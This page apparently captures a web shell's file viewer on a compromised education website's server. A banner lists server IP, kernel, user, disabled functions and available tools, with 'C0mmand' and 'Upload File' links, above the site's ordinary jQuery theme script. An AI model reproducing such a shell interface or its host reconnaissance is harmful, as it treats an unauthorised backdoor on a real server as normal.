Server IP : 103.53.40.154 / Your IP : 3.144.90.108 Web Server : Apache System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : ppcad7no ( 715) PHP Version : 8.2.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home2/ppcad7no/nextvisioneducation.com/js/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
(function ($) { "use strict"; $(document).ready(function(){ /* Mean Menu Responsive ============================*/ jQuery('nav#main-menu').meanmenu(); /* Testimonial Crousel ============================*/ $(".all-testimonial2").owlCarousel({ autoplay: true, pagination:false, nav:true, navText: ["<i class='fa fa-angle-left'></i>", "<i class='fa fa-angle-right'></i>"], dots:true, items :1, responsive:{ 0:{ items:1 }, 600:{ items:1 }, 768:{ items:1 }, 1000:{ items:1 } } }); /* Slider Crousel ============================*/ $(".all-slide").owlCarousel({ items: 1, nav: false, navText: ["<i class='fa fa-angle-left'></i>", "<i class='fa fa-angle-right'></i>"], dots: true, autoplay: true, loop: true, animateOut: 'slideOutDown', animateIn: 'flipInX', mouseDrag: false, touchDrag: false, }); $(".all-slide").on("translate.owl.carousel", function(){ $(".slider-text h1").removeClass("animated fadeInLeft").css("opacity", "0"); $(".slider-text p").removeClass("animated fadeInDown").css("opacity", "0"); $(".slider-text ul li a").removeClass("animated fadeInUp").css("opacity", "0"); }); $(".all-slide").on("translated.owl.carousel", function(){ $(".slider-text h1").addClass("animated fadeInLeft").css("opacity", "1"); $(".slider-text p").addClass("animated fadeInDown").css("opacity", "1"); $(".slider-text ul li a").addClass("animated fadeInUp").css("opacity", "1"); }); /* Patner Crousel ============================*/ $(".all-patner").owlCarousel({ autoplay: true, pagination:false, nav:true, dots:false, items :4, navText:["<i class='fa fa-angle-left'></i>","<i class='fa fa-angle-right'></i>"], responsive:{ 0:{ items:2 }, 600:{ items:2 }, 768:{ items:2 }, 992:{ items:4 }, 1000:{ items:4 } } }); /* Magnific Popup ============================*/ $('.gallery-photo').magnificPopup({ type: 'image', gallery: { enabled: true }, }); /* scrollUp ============================*/ $.scrollUp({ scrollText: '<i class="fa fa-angle-up"></i>', easingType: 'linear', scrollSpeed: 900, animation: 'fade' }); /* Counter Js ============================*/ $('.counter').counterUp({ delay: 10, time: 1000 }); /* Stickey Header ============================*/ $("#sticky_menu").sticky({topSpacing:0}); /* Stikey Js ============================*/ (function () { var nav = $('.mnmenu-sec'); var scrolled = false; $(window).scroll(function () { if (120 < $(window).scrollTop() && !scrolled) { nav.addClass('sticky_menu animated fadeInDown').animate({ 'margin-top': '0px' }); scrolled = true; } if (120 > $(window).scrollTop() && scrolled) { nav.removeClass('sticky_menu animated fadeInDown').css('margin-top', '0px'); scrolled = false; } }); }()); /* Preeloader ============================*/ $(window).load(function() { $('#preloader').fadeOut(); $('#preloader-status').delay(200).fadeOut('slow'); $('body').delay(200).css({'overflow-x':'hidden'}); }); /* Project Gallery Js ============================*/ $(".project-gallery").imagesLoaded( function() { $(".filtr-container").isotope({ itemSelector: '.filtr-item', layoutMode: 'fitRows', }); $("ul.simplefilter li").on("click",function(){ $("ul.simplefilter li").removeClass("active"); $(this).addClass("active"); var selector = $(this).attr('data-filter'); $(".filtr-container").isotope({ filter: selector, animationOptions: { duration: 750, easing: 'linear', queue: false, } }); return false; }); }); /* Wow Js ============================*/ new WOW().init(); }); })(jQuery);